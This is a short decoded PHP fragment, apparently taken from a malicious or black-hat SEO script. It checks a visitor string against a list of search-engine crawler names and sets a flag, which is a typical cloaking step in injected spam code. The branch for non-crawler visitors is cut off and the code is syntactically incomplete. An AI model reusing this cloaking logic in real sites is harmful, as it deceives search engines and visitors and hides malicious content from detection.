

The program is only for local testing in a disconnected state, please do not upload to the network, please do not use for illegal purposes!
Big brother is not educated, big brother doesn't like to talk! But big brother loves you!
decode by ccooc & peace and love 
 $false = 0;
if(strpos($tmp, 'Googlebot') !== false){
    $false = 1;
} else if(strpos($tmp, 'Baiduspider') !== false){
     $false = 1;
} else if(strpos($tmp, 'Yahoo! Slurp') !== false){
     $false = 1;
} else if(strpos($tmp, 'msnbot') !== false){
    $false = 1;
} else if(strpos($tmp, 'Sosospider') !== false){
    $false = 1;
} else if(strpos($tmp, 'YodaoBot') !== false || strpos($tmp, 'OutfoxBot') !== false){
     $false = 1;
} else if(strpos($tmp, 'Sogou web spider') !== false || strpos($tmp, 'Sogou Orion spider') !== false){
    $false = 1;
} else if(strpos($tmp, 'fast-webcrawler') !== false){
    $false = 1;
} else if(strpos($tmp, 'Gaisbot') !== false){
     $false = 1;
} else if(strpos($tmp, 'ia_archiver') !== false){
    $false = 1;
} else if(strpos($tmp, 'altavista') !== false){
    $false = 1;
} else if(strpos($tmp, 'lycos_spider') !== false){
     $false = 1;
} else if(strpos($tmp, '360Spider') !== false){
     $false = 1;
if($false==0) {

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